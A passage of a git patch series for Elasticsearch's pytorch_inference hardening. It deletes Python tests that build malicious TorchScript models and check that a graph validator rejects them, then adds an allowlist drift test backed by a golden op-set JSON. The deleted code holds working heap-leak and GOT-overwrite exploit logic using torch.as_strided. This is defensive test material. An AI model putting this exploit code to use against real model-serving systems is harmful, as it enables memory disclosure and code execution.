libtorch_cpu_addr - self.get_address_data(leak, index + 3, tmp[j : j + 1], int(mprotect_got_addr)) - del tmp[j] - assert 1 == 0, "Input tensor must have at least one element: " - return torch.zeros(0) - for i in range(heap_len): - print(tmp[i].shape) - return torch.zeros(0) - - -# --------------------------------------------------------------------------- -# Test runner -# --------------------------------------------------------------------------- - -EVIL_MODELS = { - "benign": (SimpleBenignModel, "should PASS — positive control using only allowed ops"), - "leak": (LeakModel, "should FAIL — uses as_strided to leak heap addresses"), - "exploit": (ExploitModel, "should FAIL — uses as_strided + ROP chain for file write"), -} - - -def run_tests() -> bool: - print("=" * 72) - print("Graph-Validation Test Harness for Sandbox2 Attack Models (PR #2873)") - print("=" * 72) - print(f"Allowlist size : {len(ALLOWED_OPERATIONS)} operations") - print(f"Forbidden list : {len(FORBIDDEN_OPERATIONS)} operations") - print(f"Max node count : {MAX_NODE_COUNT:,}") - print() - - tmp_dir = Path(tempfile.mkdtemp(prefix="graph_val_test_")) - all_passed = True - - try: - for name, (cls, description) in EVIL_MODELS.items(): - print(f"--- {name} model ({description}) ---") - model_path = tmp_dir / f"model_{name}.pt" - - try: - model = cls() - scripted = torch.jit.script(model) - torch.jit.save(scripted, str(model_path)) - print(f" Generated: {model_path.name} ({model_path.stat().st_size} bytes)") - except Exception as e: - print(f" SKIP: could not script {name} model: {e}") - print() - continue - - loaded = torch.jit.load(str(model_path)) - result = validate_model(loaded) - - print(f" Node count : {result['node_count']}") - print(f" Distinct ops : {len(result['all_ops'])}") - if result["forbidden_ops"]: - print(f" Forbidden ops : {result['forbidden_ops']}") - if result["unrecognised_ops"]: - print(f" Unrecognised ops: {result['unrecognised_ops']}") - print(f" Validator result: {'PASS (valid)' if result['is_valid'] else 'REJECTED (invalid)'}") - - expect_valid = (name == "benign") - if result["is_valid"] == expect_valid: - print(f" Test: OK") - else: - expected = "PASS" if expect_valid else "REJECTED" - print(f" Test: FAIL — expected {expected}") - all_passed = False - - print() - - finally: - shutil.rmtree(tmp_dir, ignore_errors=True) - - print("=" * 72) - if all_passed: - print("ALL TESTS PASSED — every attack model is rejected by the graph validator.") - else: - print("SOME TESTS FAILED — see above for details.") - print("=" * 72) - - return all_passed - - -if __name__ == "__main__": - success = run_tests() - sys.exit(0 if success else 1) diff --git a/bin/pytorch_inference/unittest/testfiles/test_pytorch_inference_evil_models.py b/bin/pytorch_inference/unittest/testfiles/test_pytorch_inference_evil_models.py deleted file mode 100644 index 2c3af4594..000000000 --- a/bin/pytorch_inference/unittest/testfiles/test_pytorch_inference_evil_models.py +++ /dev/null @@ -1,367 +0,0 @@ -#!/usr/bin/env python3 -# -# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one -# or more contributor license agreements. Licensed under the Elastic License -# 2.0 and the following additional limitation. Functionality enabled by the -# files subject to the Elastic License 2.0 may only be used in production when -# invoked by an Elasticsearch process with a license key installed that permits -# use of machine learning features. You may not use this file except in -# compliance with the Elastic License 2.0 and the foregoing additional -# limitation. -# -"""End-to-end integration test: verify pytorch_inference rejects evil models. - -This script generates the sandbox2 attack models from PR #2873, wraps them -in the binary framing format that Elasticsearch uses to send models to -pytorch_inference, and invokes the actual binary to confirm that the -CModelGraphValidator rejects them at load time — before any tensor code -executes. - -Unlike the pure-Python graph validation test (test_graph_validation_evil_models.py), -this exercises the full C++ code path: model deserialization, graph inlining, -allowlist checking, and the HANDLE_FATAL exit that Elasticsearch relies on. - -The evil models reproduce two real-world attack vectors against TorchScript: - - * LeakModel — uses torch.as_strided with an enormous storage offset - to read out-of-bounds heap memory and leak libtorch base addresses, - defeating ASLR. - - * ExploitModel — extends the heap-leak to overwrite a GOT entry - (mprotect), mark a heap page as executable, and jump to shellcode - that writes arbitrary files to disk. - -A SimpleBenignModel is included as a positive control to ensure the -validator does not reject models that use only allowlisted operations. - -Prerequisites: - - PyTorch (torch) must be installed. - - A pytorch_inference binary built from the feature/harden_pytorch_inference - branch (or any branch that includes CModelGraphValidator). - -Usage: - python3 test_pytorch_inference_evil_models.py [--binary PATH] - - --binary PATH Explicit path to the pytorch_inference executable. - If omitted, standard build locations are searched. - -Exit code: 0 if all tests pass, 1 otherwise. -""" - -import argparse -import os -import shutil -import subprocess -import sys -import tempfile -from pathlib import Path - -import torch -from torch import Tensor - -from pytorch_inference_test_utils import ( - find_pytorch_inference, - run_pytorch_inference, - script_and_save_model, -) - - -# --------------------------------------------------------------------------- -# Attack model definitions (from PR #2873 sandbox2 security research) -# -# These models are intentionally malicious. They must NEVER be executed -# outside of a sandboxed environment — the graph validator should reject -# them before any forward() code runs. -# --------------------------------------------------------------------------- - - -class SimpleBenignModel(torch.nn.Module): - """Positive control — uses only allowlisted ops (aten::add, aten::unsqueeze).""" - def forward(self, a: Tensor, b: Tensor, c: Tensor, d: Tensor) -> Tensor: - return (a + b + c + d).unsqueeze(0) - - -class LeakModel(torch.nn.Module): - """Heap-address leak via torch.as_strided with a malicious storage offset. - - Creates an out-of-bounds strided view into the process heap, then scans - for libtorch pointer patterns to compute the library base address. - Rejected by the graph validator because aten::as_strided, aten::item, - and aten::__rshift__ are not in the allowlist. - """ - def find_heap_overlap(self, tensors: Tensor) -> tuple[list[int], Tensor]: - evil_length = 0x900 * 8 - leak = torch.as_strided( - tensors, [evil_length], [1], 2305843009213693952 - evil_length - ) - index: list[int] = [-1] - for i in range(evil_length - 1 - 5, -1, -1): - if ( - leak[i + 3].item() == leak[i + 5].item() - and leak[i + 3].item() >> 40 == 127 - ): - if ( - leak[i + 2].item() >= 0x100000000 - and leak[i + 2].item() <= 0x100000005 - ): - index.append(i) - return (index, leak) - - def forward(self, a: Tensor, b: Tensor, c: Tensor, d: Tensor) -> Tensor: - tmp: list[Tensor] = [] - heap_len = 200 - array_len = 0x900 - for i in range(heap_len): - tmp_values = [0xDEAD00000 + i] + [ - 0xDEAD00000 + j for j in range(2, array_len) - ] - tmp.append(torch.tensor(tmp_values)) - for i in range(heap_len): - indexs, leak = self.find_heap_overlap(tmp[i]) - indexs = indexs[1:] - if indexs == []: - continue - for index in indexs: - heap_addr = leak[index + 3].item() - libtorch_python_addr = leak[index + 1].item() - libtorch_cpu_addr = libtorch_python_addr - 0xC878B50 - assert 1 == 0, ( - "Input tensor must have at least one element: " - + hex(libtorch_cpu_addr) - ) - for i in range(heap_len): - print(tmp[i].shape) - return torch.zeros(0) - - -class ExploitModel(torch.nn.Module): - """ROP-chain exploit: mprotect + shellcode to write arbitrary files. - - After leaking the libtorch base address (same technique as LeakModel), - overwrites a GOT entry to redirect mprotect into a ROP gadget chain - that marks a heap page as executable, then jumps to embedded shellcode. - Rejected by the graph validator because aten::as_strided, aten::item, - aten::Delete and other operations are not in the allowlist. - """ - def find_heap_overlap(self, tensors: Tensor) -> tuple[list[int], Tensor]: - evil_length = 0x900 * 8 - leak = torch.as_strided( - tensors, [evil_length], [1], 2305843009213693952 - evil_length - ) - index: list[int] = [-1] - for i in range(evil_length - 1 - 5, -1, -1): - if ( - leak[i + 3].item() == leak[i + 5].item() - and leak[i + 3].item() >> 40 == 127 - ): - if ( - leak[i + 2].item() >= 0x100000000 - and leak[i + 2].item() <= 0x100000005 - ): - index.append(i) - return (index, leak) - - def get_address_data( - self, leak: Tensor, index: int, tmp: list[Tensor], target_addr: int - ) -> int: - leak[index] = target_addr - return int(tmp[0].item()) - - def forward(self, a: Tensor, b: Tensor, c: Tensor, d: Tensor) -> Tensor: - tmp: list[Tensor] = [] - heap_len = 200 - array_len = 0x900 - for i in range(heap_len): - tmp_values = [0xDEAD00000 + i] + [ - 0xDEAD00000 + j for j in range(2, array_len) - ] - tmp.append(torch.tensor(tmp_values)) - for i in range(heap_len): - indexs, leak = self.find_heap_overlap(tmp[i]) - indexs = indexs[1:] - if indexs == []: - continue - for index in indexs: - heap_addr = leak[index + 3].item() - libtorch_python_addr = leak[index + 1].item() - libtorch_cpu_addr = libtorch_python_addr - 0xC878B50 - leak[index + 3] = int(heap_addr - 0x8) - for j in range(heap_len): - if tmp[j][2].item() == 0xDEAD00002 and i != j: - mprotect_got_addr = 0xC9785F0 + libtorch_cpu_addr - self.get_address_data( - leak, index + 3, tmp[j : j + 1], int(mprotect_got_addr) - ) - del tmp[j] - assert 1 == 0, "Input tensor must have at least one element: " - return torch.zeros(0) - for i in range(heap_len): - print(tmp[i].shape) - return torch.zeros(0) - - -# --------------------------------------------------------------------------- -# Test configuration -# --------------------------------------------------------------------------- - -MODELS = { - "benign": { - "class": SimpleBenignModel, - "expect_rejected": False, - "description": "positive control — only allowlisted ops", - }, - "leak": { - "class": LeakModel, - "expect_rejected": True, - "description": "heap-address leak via aten::as_strided", - "expect_stderr_contains": "Unrecognised operations", - }, - "exploit": { - "class": ExploitModel, - "expect_rejected": True, - "description": "ROP-chain file-write via aten::as_strided", - "expect_stderr_contains": "Unrecognised operations", - }, -} - -# Phrases that indicate the graph validator actively rejected the model. -# Must be specific enough to avoid matching benign log lines like -# "Model verified: no forbidden operations detected." -_REJECTION_PHRASES = [ - "Model contains forbidden operations:", - "Unrecognised operations:", - "graph validation failed", - "graph is too large:", - "contains forbidden operation:", -] - - -# --------------------------------------------------------------------------- -# Test execution -# --------------------------------------------------------------------------- - - -def run_tests(binary: str) -> bool: - """Generate evil models, run pytorch_inference, and check outcomes.""" - print("=" * 72) - print("Integration Test: pytorch_inference vs sandbox2 attack models") - print("=" * 72) - print(f"Binary: {binary}") - print() - - tmp_dir = Path(tempfile.mkdtemp(prefix="pt_infer_evil_test_")) - all_passed = True - - try: - for name, spec in MODELS.items(): - model_path = tmp_dir / f"model_{name}.pt" - expect_rejected = spec["expect_rejected"] - - print(f"--- {name}: {spec['description']} ---") - - try: - script_and_save_model(spec["class"](), model_path) - print(f" Model generated: {model_path.name} ({model_path.stat().st_size} bytes)") - except Exception as e: - print(f" SKIP: could not generate model: {e}") - print() - continue - - try: - exit_code, stdout, stderr = run_pytorch_inference( - binary, model_path, tmp_dir - ) - except subprocess.TimeoutExpired: - print(f" FAIL: pytorch_inference timed out (30s)") - all_passed = False - print() - continue - except Exception as e: - print(f" ERROR running pytorch_inference: {e}") - all_passed = False - print() - continue - - print(f" Exit code: {exit_code}") - if stderr.strip(): - stderr_lines = stderr.strip().splitlines() - display_lines = stderr_lines[-10:] if len(stderr_lines) > 10 else stderr_lines - print(f" Stderr ({len(stderr_lines)} lines, showing last {len(display_lines)}):") - for line in display_lines: - print(f" {line}") - - was_rejected_by_validator = any(p in stderr for p in _REJECTION_PHRASES) - - if expect_rejected: - if was_rejected_by_validator: - print(f" Result: REJECTED by graph validator (as expected)") - expect_msg = spec.get("expect_stderr_contains") - if expect_msg and expect_msg in stderr: - print(f" Reason check: found '{expect_msg}' in stderr") - print(f" Test: OK") - elif exit_code != 0: - print(f" Result: process exited with code {exit_code} but no validator rejection detected") - print(f" WARNING: the binary may not include the full graph validation yet") - print(f" Test: INCONCLUSIVE (not counted as failure)") - else: - print(f" Result: ACCEPTED (exit 0, no validator rejection)") - print(f" Test: FAIL — evil model was not rejected") - all_passed = False - else: - if was_rejected_by_validator: - print(f" Result: REJECTED by validator — benign model should have passed") - print(f" Test: FAIL") - all_passed = False - else: - print(f" Result: no validation errors (exit code {exit_code})") - print(f" Test: OK") - - print() - - finally: - shutil.rmtree(tmp_dir, ignore_errors=True) - - print("=" * 72) - if all_passed: - print("ALL TESTS PASSED") - else: - print("SOME TESTS FAILED — see above for details.") - print("=" * 72) - - return all_passed - - -# --------------------------------------------------------------------------- -# CLI entry point -# --------------------------------------------------------------------------- - - -def main(): - parser = argparse.ArgumentParser( - description="Integration test: pytorch_inference vs sandbox2 attack models" - ) - parser.add_argument( - "--binary", - default=None, - help="Path to pytorch_inference binary (auto-detected if omitted)", - ) - args = parser.parse_args() - - binary = args.binary - if binary is None: - try: - binary = find_pytorch_inference() - except FileNotFoundError as e: - print(f"ERROR: {e}", file=sys.stderr) - sys.exit(1) - - if not os.path.isfile(binary) or not os.access(binary, os.X_OK): - print(f"ERROR: {binary} is not an executable file", file=sys.stderr) - sys.exit(1) - - success = run_tests(binary) - sys.exit(0 if success else 1) - - -if __name__ == "__main__": - main() diff --git a/bin/pytorch_inference/unittest/testfiles/generate_malicious_models.py b/dev-tools/generate_malicious_models.py similarity index 97% rename from bin/pytorch_inference/unittest/testfiles/generate_malicious_models.py rename to dev-tools/generate_malicious_models.py index 67a053c38..21afe1110 100644 --- a/bin/pytorch_inference/unittest/testfiles/generate_malicious_models.py +++ b/dev-tools/generate_malicious_models.py @@ -266,7 +266,9 @@ def generate(output_dir: Path): if __name__ == "__main__": - out_dir = Path(sys.argv[1]) if len(sys.argv) > 1 else Path(__file__).parent / "malicious_models" + out_dir = (Path(sys.argv[1]) if len(sys.argv) > 1 + else Path(__file__).resolve().parent.parent + / "bin" / "pytorch_inference" / "unittest" / "testfiles" / "malicious_models") print(f"Generating malicious model fixtures in {out_dir}") success = generate(out_dir) sys.exit(0 if success else 1) diff --git a/docs/CHANGELOG.asciidoc b/docs/CHANGELOG.asciidoc index b4fd92daa..fa5b7ed70 100644 --- a/docs/CHANGELOG.asciidoc +++ b/docs/CHANGELOG.asciidoc @@ -32,7 +32,7 @@ === Enhancements -* Harden pytorch_inference with TorchScript model graph validation. (See {ml-pull}[#2936].) +* Harden pytorch_inference with TorchScript model graph validation. (See {ml-pull}2936[#2936].) * Better handling of invalid JSON state documents (See {ml-pull}[]#2895].) * Better error handling regarding quantiles state documents (See {ml-pull}[#2894]) From 292356414b0948e6cf61a5486049d953dbde7a4a Mon Sep 17 00:00:00 2001 From: Ed Savage Date: Thu, 12 Mar 2026 12:08:16 +1300 Subject: [PATCH 29/30] Add allowlist drift detection test with golden op-set file Add a C++ test (testAllowlistCoversReferenceModels) that loads a golden JSON file containing per-architecture TorchScript op sets extracted from 18 reference HuggingFace models and verifies every op is in ALLOWED_OPERATIONS and none are in FORBIDDEN_OPERATIONS. This catches allowlist regressions in CI without requiring Python or network access. When PyTorch is upgraded, regenerate the golden file with: python3 extract_model_ops.py --golden \ bin/pytorch_inference/unittest/testfiles/reference_model_ops.json The --golden flag is a new addition to extract_model_ops.py that outputs per-model op sets as structured JSON. Made-with: Cursor --- .../unittest/CModelGraphValidatorTest.cc | 52 ++ .../testfiles/reference_model_ops.json | 682 ++++++++++++++++++ dev-tools/extract_model_ops/README.md | 36 +- .../extract_model_ops/extract_model_ops.py | 29 +- 4 files changed, 796 insertions(+), 3 deletions(-) create mode 100644 bin/pytorch_inference/unittest/testfiles/reference_model_ops.json diff --git a/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc b/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc index dab37505c..b6e521a3c 100644 --- a/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc +++ b/bin/pytorch_inference/unittest/CModelGraphValidatorTest.cc @@ -13,10 +13,13 @@ #include +#include #include #include +#include +#include #include #include #include @@ -432,4 +435,53 @@ BOOST_AUTO_TEST_CASE(testMaliciousRopExploit) { BOOST_REQUIRE(hasForbiddenOp(result, "aten::as_strided")); } +// --- Allowlist drift detection --- +// +// Validates that ALLOWED_OPERATIONS covers every operation observed in +// the reference HuggingFace models. The golden file is generated by +// dev-tools/extract_model_ops/extract_model_ops.py --golden and should +// be regenerated whenever PyTorch is upgraded or the set of supported +// architectures changes. + +BOOST_AUTO_TEST_CASE(testAllowlistCoversReferenceModels) { + std::ifstream file("testfiles/reference_model_ops.json"); + BOOST_REQUIRE_MESSAGE(file.is_open(), + "Could not open testfiles/reference_model_ops.json — " + "regenerate with: python3 dev-tools/extract_model_ops/" + "extract_model_ops.py --golden " + "bin/pytorch_inference/unittest/testfiles/reference_model_ops.json"); + + std::ostringstream buf; + buf << file.rdbuf(); + auto root = boost::json::parse(buf.str()).as_object(); + + auto& models = root.at("models").as_object(); + BOOST_REQUIRE_MESSAGE(models.size() > 0, "Golden file contains no models"); + + const auto& allowed = CSupportedOperations::ALLOWED_OPERATIONS; + const auto& forbidden = CSupportedOperations::FORBIDDEN_OPERATIONS; + + for (const auto& [arch, entry] : models) { + const auto& info = entry.as_object(); + const auto& ops = info.at("ops").as_array(); + std::string modelId{info.at("model_id").as_string()}; + + for (const auto& opVal : ops) { + std::string op{opVal.as_string()}; + + BOOST_CHECK_MESSAGE( + forbidden.count(op) == 0, + arch << " (" << modelId << "): op " << op + << " is in FORBIDDEN_OPERATIONS — a legitimate model " + << "should not use forbidden ops"); + + BOOST_CHECK_MESSAGE( + allowed.count(op) == 1, + arch << " (" << modelId << "): op " << op + << " is not in ALLOWED_OPERATIONS — update the allowlist " + << "or check if this op was introduced by a PyTorch upgrade"); + } + } +} + BOOST_AUTO_TEST_SUITE_END() diff --git a/bin/pytorch_inference/unittest/testfiles/reference_model_ops.json b/bin/pytorch_inference/unittest/testfiles/reference_model_ops.json new file mode 100644 index 000000000..164ead379 --- /dev/null +++ b/bin/pytorch_inference/unittest/testfiles/reference_model_ops.json @@ -0,0 +1,682 @@ +{ + "pytorch_version": "2.7.1", + "models": { + "bert": { + "model_id": "bert-base-uncased", + "ops": [ + "aten::Int", + "aten::ScalarImplicit", + "aten::__and__", + "aten::add", + "aten::arange", + "aten::contiguous", + "aten::dropout", + "aten::embedding", + "aten::expand", + "aten::gather", + "aten::ge", + "aten::gelu", + "aten::index", + "aten::layer_norm", + "aten::linear", + "aten::new_ones", + "aten::reshape", + "aten::scaled_dot_product_attention", + "aten::select", + "aten::size", + "aten::slice", + "aten::tanh", + "aten::to", + "aten::transpose", + "aten::unsqueeze", + "aten::view", + "prim::Constant", + "prim::DictConstruct", + "prim::GetAttr", + "prim::ListConstruct", + "prim::NumToTensor" + ] + }, + "deberta": { + "model_id": "microsoft/deberta-base", + "ops": [ + "aten::Int", + "aten::ScalarImplicit", + "aten::add", + "aten::add_", + "aten::arange", + "aten::bitwise_not", + "aten::chunk", + "aten::clamp", + "aten::contiguous", + "aten::div", + "aten::div_", + "aten::dropout", + "aten::embedding", + "aten::expand", + "aten::gather", + "aten::gelu", + "aten::linear", + "aten::masked_fill", + "aten::matmul", + "aten::mean", + "aten::mul", + "aten::ne", + "aten::neg", + "aten::permute", + "aten::pow", + "aten::repeat", + "aten::rsub", + "aten::select", + "aten::size", + "aten::slice", + "aten::softmax", + "aten::sqrt", + "aten::squeeze", + "aten::sub", + "aten::tensor", + "aten::to", + "aten::transpose", + "aten::unsqueeze", + "aten::view", + "prim::Constant", + "prim::DictConstruct", + "prim::GetAttr", + "prim::If", + "prim::ListConstruct", + "prim::ListUnpack", + "prim::TupleConstruct", + "prim::TupleUnpack", + "prim::device", + "prim::max", + "prim::min" + ] + }, + "distilbert": { + "model_id": "distilbert-base-uncased", + "ops": [ + "aten::Int", + "aten::ScalarImplicit", + "aten::__and__", + "aten::add", + "aten::arange", + "aten::contiguous", + "aten::dropout", + "aten::embedding", + "aten::expand", + "aten::ge", + "aten::gelu", + "aten::index", + "aten::layer_norm", + "aten::linear", + "aten::new_ones", + "aten::reshape", + "aten::scaled_dot_product_attention", + "aten::size", + "aten::slice", + "aten::to", + "aten::transpose", + "aten::unsqueeze", + "aten::view", + "prim::Constant", + "prim::DictConstruct", + "prim::GetAttr", + "prim::ListConstruct", + "prim::NumToTensor" + ] + }, + "dpr": { + "model_id": "facebook/dpr-ctx_encoder-single-nq-base", + "ops": [ + "aten::Int", + "aten::__and__", + "aten::add", + "aten::arange", + "aten::contiguous", + "aten::dropout", + "aten::embedding", + "aten::expand", + "aten::ge", + "aten::gelu", + "aten::index", + "aten::layer_norm", + "aten::linear", + "aten::new_ones", + "aten::reshape", + "aten::scaled_dot_product_attention", + "aten::select", + "aten::size", + "aten::slice", + "aten::to", + "aten::transpose", + "aten::unsqueeze", + "aten::view", + "aten::zeros", + "prim::Constant", + "prim::DictConstruct", + "prim::GetAttr", + "prim::ListConstruct", + "prim::NumToTensor" + ] + }, + "elastic-bge-m3": { + "model_id": "elastic/bge-m3", + "ops": [ + "aten::Int", + "aten::ScalarImplicit", + "aten::__and__", + "aten::add", + "aten::arange", + "aten::contiguous", + "aten::cumsum", + "aten::dropout", + "aten::embedding", + "aten::expand", + "aten::gather", + "aten::ge", + "aten::gelu", + "aten::index", + "aten::layer_norm", + "aten::linear", + "aten::mul", + "aten::ne", + "aten::new_ones", + "aten::reshape", + "aten::scaled_dot_product_attention", + "aten::select", + "aten::size", + "aten::slice", + "aten::tanh", + "aten::to", + "aten::transpose", + "aten::type_as", + "aten::unsqueeze", + "aten::view", + "prim::Constant", + "prim::DictConstruct", + "prim::GetAttr", + "prim::ListConstruct", + "prim::NumToTensor" + ] + }, + "elastic-distilbert-cased-ner": { + "model_id": "elastic/distilbert-base-cased-finetuned-conll03-english", + "ops": [ + "aten::Int", + "aten::ScalarImplicit", + "aten::__and__", + "aten::add", + "aten::arange", + "aten::contiguous", + "aten::dropout", + "aten::embedding", + "aten::expand", + "aten::ge", + "aten::gelu", + "aten::index", + "aten::layer_norm", + "aten::linear", + "aten::new_ones", + "aten::reshape", + "aten::scaled_dot_product_attention", + "aten::size", + "aten::slice", + "aten::to", + "aten::transpose", + "aten::unsqueeze", + "aten::view", + "prim::Constant", + "prim::DictConstruct", + "prim::GetAttr", + "prim::ListConstruct", + "prim::NumToTensor" + ] + }, + "elastic-distilbert-uncased-ner": { + "model_id": "elastic/distilbert-base-uncased-finetuned-conll03-english", + "ops": [ + "aten::Int", + "aten::ScalarImplicit", + "aten::__and__", + "aten::add", + "aten::arange", + "aten::contiguous", + "aten::dropout", + "aten::embedding", + "aten::expand", + "aten::ge", + "aten::gelu", + "aten::index", + "aten::layer_norm", + "aten::linear", + "aten::new_ones", + "aten::reshape", + "aten::scaled_dot_product_attention", + "aten::size", + "aten::slice", + "aten::to", + "aten::transpose", + "aten::unsqueeze", + "aten::view", + "prim::Constant", + "prim::DictConstruct", + "prim::GetAttr", + "prim::ListConstruct", + "prim::NumToTensor" + ] + }, + "elastic-eis-elser-v2": { + "model_id": "elastic/eis-elser-v2", + "ops": [ + "aten::Int", + "aten::ScalarImplicit", + "aten::__and__", + "aten::add", + "aten::arange", + "aten::contiguous", + "aten::dropout", + "aten::embedding", + "aten::expand", + "aten::gather", + "aten::ge", + "aten::gelu", + "aten::index", + "aten::layer_norm", + "aten::linear", + "aten::new_ones", + "aten::reshape", + "aten::scaled_dot_product_attention", + "aten::select", + "aten::size", + "aten::slice", + "aten::tanh", + "aten::to", + "aten::transpose", + "aten::unsqueeze", + "aten::view", + "prim::Constant", + "prim::DictConstruct", + "prim::GetAttr", + "prim::ListConstruct", + "prim::NumToTensor" + ] + }, + "elastic-elser-v2": { + "model_id": "elastic/elser-v2", + "ops": [ + "aten::Int", + "aten::ScalarImplicit", + "aten::__and__", + "aten::add", + "aten::arange", + "aten::contiguous", + "aten::dropout", + "aten::embedding", + "aten::expand", + "aten::gather", + "aten::ge", + "aten::gelu", + "aten::index", + "aten::layer_norm", + "aten::linear", + "aten::new_ones", + "aten::reshape", + "aten::scaled_dot_product_attention", + "aten::select", + "aten::size", + "aten::slice", + "aten::tanh", + "aten::to", + "aten::transpose", + "aten::unsqueeze", + "aten::view", + "prim::Constant", + "prim::DictConstruct", + "prim::GetAttr", + "prim::ListConstruct", + "prim::NumToTensor" + ] + }, + "elastic-hugging-face-elser": { + "model_id": "elastic/hugging-face-elser", + "ops": [ + "aten::Int", + "aten::ScalarImplicit", + "aten::__and__", + "aten::add", + "aten::arange", + "aten::contiguous", + "aten::dropout", + "aten::embedding", + "aten::expand", + "aten::gather", + "aten::ge", + "aten::gelu", + "aten::index", + "aten::layer_norm", + "aten::linear", + "aten::new_ones", + "aten::reshape", + "aten::scaled_dot_product_attention", + "aten::select", + "aten::size", + "aten::slice", + "aten::tanh", + "aten::to", + "aten::transpose", + "aten::unsqueeze", + "aten::view", + "prim::Constant", + "prim::DictConstruct", + "prim::GetAttr", + "prim::ListConstruct", + "prim::NumToTensor" + ] + }, + "elastic-multilingual-e5-small-optimized": { + "model_id": "elastic/multilingual-e5-small-optimized", + "ops": [ + "aten::Int", + "aten::ScalarImplicit", + "aten::__and__", + "aten::add", + "aten::arange", + "aten::contiguous", + "aten::dropout", + "aten::embedding", + "aten::expand", + "aten::gather", + "aten::ge", + "aten::gelu", + "aten::index", + "aten::layer_norm", + "aten::linear", + "aten::new_ones", + "aten::reshape", + "aten::scaled_dot_product_attention", + "aten::select", + "aten::size", + "aten::slice", + "aten::tanh", + "aten::to", + "aten::transpose", + "aten::unsqueeze", + "aten::view", + "prim::Constant", + "prim::DictConstruct", + "prim::GetAttr", + "prim::ListConstruct", + "prim::NumToTensor" + ] + }, + "elastic-splade-v3": { + "model_id": "elastic/splade-v3", + "ops": [ + "aten::Int", + "aten::ScalarImplicit", + "aten::__and__", + "aten::add", + "aten::arange", + "aten::contiguous", + "aten::dropout", + "aten::embedding", + "aten::expand", + "aten::gather", + "aten::ge", + "aten::gelu", + "aten::index", + "aten::layer_norm", + "aten::linear", + "aten::new_ones", + "aten::reshape", + "aten::scaled_dot_product_attention", + "aten::select", + "aten::size", + "aten::slice", + "aten::tanh", + "aten::to", + "aten::transpose", + "aten::unsqueeze", + "aten::view", + "prim::Constant", + "prim::DictConstruct", + "prim::GetAttr", + "prim::ListConstruct", + "prim::NumToTensor" + ] + }, + "elastic-test-elser-v2": { + "model_id": "elastic/test-elser-v2", + "ops": [ + "aten::Int", + "aten::ScalarImplicit", + "aten::__and__", + "aten::add", + "aten::arange", + "aten::contiguous", + "aten::dropout", + "aten::embedding", + "aten::expand", + "aten::gather", + "aten::ge", + "aten::gelu", + "aten::index", + "aten::layer_norm", + "aten::linear", + "aten::new_ones", + "aten::reshape", + "aten::scaled_dot_product_attention", + "aten::select", + "aten::size", + "aten::slice", + "aten::tanh", + "aten::to", + "aten::transpose", + "aten::unsqueeze", + "aten::view", + "prim::Constant", + "prim::DictConstruct", + "prim::GetAttr", + "prim::ListConstruct", + "prim::NumToTensor" + ] + }, + "electra": { + "model_id": "google/electra-small-discriminator", + "ops": [ + "aten::Int", + "aten::ScalarImplicit", + "aten::__and__", + "aten::add", + "aten::arange", + "aten::contiguous", + "aten::dropout", + "aten::embedding", + "aten::expand", + "aten::gather", + "aten::ge", + "aten::gelu", + "aten::index", + "aten::layer_norm", + "aten::linear", + "aten::new_ones", + "aten::reshape", + "aten::scaled_dot_product_attention", + "aten::size", + "aten::slice", + "aten::to", + "aten::transpose", + "aten::unsqueeze", + "aten::view", + "prim::Constant", + "prim::DictConstruct", + "prim::GetAttr", + "prim::ListConstruct", + "prim::NumToTensor" + ] + }, + "mobilebert": { + "model_id": "google/mobilebert-uncased", + "ops": [ + "aten::Int", + "aten::ScalarImplicit", + "aten::__and__", + "aten::add", + "aten::arange", + "aten::cat", + "aten::contiguous", + "aten::dropout", + "aten::embedding", + "aten::expand", + "aten::ge", + "aten::index", + "aten::linear", + "aten::mul", + "aten::new_ones", + "aten::pad", + "aten::relu", + "aten::reshape", + "aten::scaled_dot_product_attention", + "aten::select", + "aten::size", + "aten::slice", + "aten::to", + "aten::transpose", + "aten::unsqueeze", + "aten::view", + "aten::zeros", + "prim::Constant", + "prim::DictConstruct", + "prim::GetAttr", + "prim::ListConstruct", + "prim::NumToTensor", + "prim::TupleConstruct", + "prim::TupleUnpack" + ] + }, + "mpnet": { + "model_id": "microsoft/mpnet-base", + "ops": [ + "aten::abs", + "aten::add", + "aten::add_", + "aten::arange", + "aten::contiguous", + "aten::cumsum", + "aten::div", + "aten::dropout", + "aten::embedding", + "aten::expand", + "aten::full_like", + "aten::gelu", + "aten::layer_norm", + "aten::linear", + "aten::log", + "aten::lt", + "aten::matmul", + "aten::min", + "aten::mul", + "aten::ne", + "aten::neg", + "aten::permute", + "aten::rsub", + "aten::select", + "aten::size", + "aten::slice", + "aten::softmax", + "aten::sub", + "aten::tanh", + "aten::to", + "aten::transpose", + "aten::type_as", + "aten::unsqueeze", + "aten::view", + "aten::where", + "prim::Constant", + "prim::DictConstruct", + "prim::GetAttr", + "prim::ListConstruct" + ] + }, + "roberta": { + "model_id": "roberta-base", + "ops": [ + "aten::Int", + "aten::ScalarImplicit", + "aten::__and__", + "aten::add", + "aten::arange", + "aten::contiguous", + "aten::cumsum", + "aten::dropout", + "aten::embedding", + "aten::expand", + "aten::gather", + "aten::ge", + "aten::gelu", + "aten::index", + "aten::layer_norm", + "aten::linear", + "aten::mul", + "aten::ne", + "aten::new_ones", + "aten::reshape", + "aten::scaled_dot_product_attention", + "aten::select", + "aten::size", + "aten::slice", + "aten::tanh", + "aten::to", + "aten::transpose", + "aten::type_as", + "aten::unsqueeze", + "aten::view", + "prim::Constant", + "prim::DictConstruct", + "prim::GetAttr", + "prim::ListConstruct", + "prim::NumToTensor" + ] + }, + "xlm-roberta": { + "model_id": "xlm-roberta-base", + "ops": [ + "aten::Int", + "aten::ScalarImplicit", + "aten::__and__", + "aten::add", + "aten::arange", + "aten::contiguous", + "aten::cumsum", + "aten::dropout", + "aten::embedding", + "aten::expand", + "aten::gather", + "aten::ge", + "aten::gelu", + "aten::index", + "aten::layer_norm", + "aten::linear", + "aten::mul", + "aten::ne", + "aten::new_ones", + "aten::reshape", + "aten::scaled_dot_product_attention", + "aten::select", + "aten::size", + "aten::slice", + "aten::tanh", + "aten::to", + "aten::transpose", + "aten::type_as", + "aten::unsqueeze", + "aten::view", + "prim::Constant", + "prim::DictConstruct", + "prim::GetAttr", + "prim::ListConstruct", + "prim::NumToTensor" + ] + } + } +} diff --git a/dev-tools/extract_model_ops/README.md b/dev-tools/extract_model_ops/README.md index ff7530bc2..f7b7f2f39 100644 --- a/dev-tools/extract_model_ops/README.md +++ b/dev-tools/extract_model_ops/README.md @@ -51,6 +51,10 